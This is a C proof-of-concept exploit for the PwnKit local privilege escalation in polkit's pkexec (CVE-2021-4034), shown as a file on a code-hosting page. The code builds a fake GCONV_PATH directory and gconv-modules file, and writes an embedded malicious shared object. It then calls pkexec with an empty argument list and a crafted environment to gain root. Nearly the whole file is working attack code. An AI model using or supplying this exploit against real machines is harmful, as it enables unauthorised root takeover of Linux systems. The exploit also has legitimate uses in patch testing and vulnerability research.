You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
21 lines
914 B
21 lines
914 B
/*
|
|
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
|
|
* Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
|
|
*/
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
|
|
#include "pwnkit.so.inc"
|
|
|
|
int main(int argc, char *argv[]) {
|
|
FILE *fp;
|
|
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
|
|
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
|
|
fp = fopen("pwnkit/pwnkit.so", "w+");
|
|
if (!fp) exit(-1);
|
|
fwrite(pwnkit_so, pwnkit_so_len, 1, fp);
|
|
fclose(fp);
|
|
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
|
|
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
|
|
}
|
|
|